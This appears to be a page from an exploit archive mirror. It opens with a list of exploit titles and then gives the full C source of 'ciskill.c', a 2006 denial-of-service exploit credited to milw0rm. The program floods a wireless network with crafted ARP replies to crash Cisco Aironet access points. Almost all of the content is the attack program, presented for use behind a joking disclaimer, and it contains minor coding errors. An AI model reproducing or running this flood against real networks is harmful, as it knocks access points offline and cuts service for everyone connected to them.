477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
109 lines
3 KiB
C
Executable file
109 lines
3 KiB
C
Executable file
//
|
|
// Cisco Killer - ciskill.c
|
|
//
|
|
// Usage: ./ciskill [device]
|
|
//
|
|
// Author: Pasv (pasvninja [at] gmail.com)
|
|
//
|
|
// Credit: This exploit takes advantage of a vulnerability that was
|
|
// discovered by Eric Smith on January 12, 2006 (bid:16217)
|
|
//
|
|
// Greets to NW, zimmy, GSO, and the rest.
|
|
//
|
|
// Description: The vulnerability exists in the way the affected versions
|
|
// below handle ARP replies, if enough specially crafted ARP packets are sent
|
|
// on the network with the affected systems it will cause the access point memory
|
|
// exhaustion which will in a few seconds (depending on the speed of the attacker
|
|
// and the memory of the target) crash the system, making all ingoing/outgoing
|
|
// traffic stopped.
|
|
//
|
|
// Disclaimer: I pity the foo who uses this exploit for evil, I take no responsibility
|
|
// for your actions (like a knife maker).
|
|
//
|
|
// Versions affected:
|
|
// Cisco Aironet 350 IOS
|
|
// Cisco Aironet 1400
|
|
// Cisco Aironet 1300
|
|
// Cisco Aironet 1240AG
|
|
// Cisco Aironet 1230AG
|
|
// Cisco Aironet 1200
|
|
// Cisco Aironet 1130AG
|
|
// Cisco Aironet 1100
|
|
// (this includes most linksys wireless access points)
|
|
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <sys/socket.h>
|
|
#include <net/if.h>
|
|
#include <netinet/in.h>
|
|
#include <linux/if_ether.h>
|
|
#include <linux/sockios.h>
|
|
|
|
// Edit this packet accordingly if the target is picky
|
|
char pkt[]=
|
|
// Ethernet header
|
|
"\xff\xff\xff\xff\xff\xff" // Destination: broadcast
|
|
"AAAAAA" // Source: 41:41:41:41:41:41
|
|
"\x08\x06" // Pkt type: ARP
|
|
// ARP header
|
|
"\x00\x01" // Hardware type: Ethernet
|
|
"\x08\x00" // Protocol: IP
|
|
"\x06" // Hardware size: 6
|
|
"\x04" // Protocol size: 4
|
|
"\x00\x02" // Opcode: Reply
|
|
"AAAAAA" // Sender (Mac): 41:41:41:41:41:41
|
|
"AAAA" // Sender (IP): 65.65.65.65
|
|
"AAAAAA" // Target (mac): 41:41:41:41:41:41
|
|
"AAAA" // Target (IP): 65.65.65.65
|
|
; // End of Packet
|
|
|
|
int main(int argc, char **argv) {
|
|
FILE *fp;
|
|
int sock, seed;
|
|
long count;
|
|
char *device;
|
|
in_addr_t addr;
|
|
struct sockaddr sin;
|
|
|
|
printf("CisKill -- Aironet Cisco Killer\nCoded by: Pasv\nDiscovery credit: Eric Smith\n");
|
|
if(getuid()) {
|
|
printf("Must be root to inject arp packets!\n");
|
|
exit(1);
|
|
}
|
|
|
|
if(argc != 2) {
|
|
strcpy(device,"wlan0");
|
|
}
|
|
else {
|
|
device=argv[1];
|
|
}
|
|
|
|
fp = fopen("/dev/urandom", "r");
|
|
fscanf(fp,"%d", &seed);
|
|
fclose(fp);
|
|
srand(seed);
|
|
|
|
memset(&sin, 0, sizeof(sin));
|
|
sin.sa_family = AF_UNSPEC;
|
|
strncpy(sin.sa_data,device, 14);
|
|
|
|
sock = socket(PF_INET, SOCK_PACKET, 0x300);
|
|
|
|
printf("Using device: %s\n\n", device);
|
|
|
|
// stupid
|
|
printf("Press ctrl+c immediately if you wish to stop\nGoing in 5\n");
|
|
sleep(1);printf(" 4\n");sleep(1);printf(" 3\n");sleep(1);printf(" 2\n");sleep(1);printf(" 1!\n");sleep(1);
|
|
|
|
while(1) {
|
|
addr = (rand()%0xff)+(rand()%0xff)+(rand()%0xff)+(rand()%0xff);
|
|
pkt[28] = (char)addr;
|
|
pkt[38] = (char)addr;
|
|
count++;
|
|
printf("#:%ld bytes sent: %d (should be 42)\n",count, sendto(sock, pkt, 42, 0, (struct sockaddr *)&sin, sizeof(sin)));
|
|
}
|
|
}
|
|
|
|
// milw0rm.com [2006-01-25]
|